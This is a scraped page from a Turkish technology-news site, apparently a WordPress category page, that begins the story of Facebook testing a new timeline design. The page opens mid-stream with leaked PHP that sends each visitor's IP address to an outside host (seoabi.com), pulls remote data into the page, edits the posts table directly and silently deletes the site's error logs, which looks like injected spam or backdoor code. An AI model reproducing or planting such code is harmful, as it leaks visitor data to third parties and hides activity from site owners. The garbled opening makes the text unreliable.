$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> 7 mart yeni tasarım | Teknoloji Haberleri

7 mart yeni tasarım kategorisindeki tüm yazılar

Son Yazılar

7 Mart Facebook Görüntüsü

Facebook’ un uzun süredir beklenilen tasarımı Yeni Zelanda’ da test edildiği ortaya çıktı. The Next Web’ de yer alan yeni zaman tüneline ait ekran resimleri baz alındığında yeni tasarımın tek sütunlu olacağı göze çarpıyor. Yeni tasarımda kullanıcının gözüne ilk çarpan değişim ise, birden fazla öğenin gruplanarak sayfanın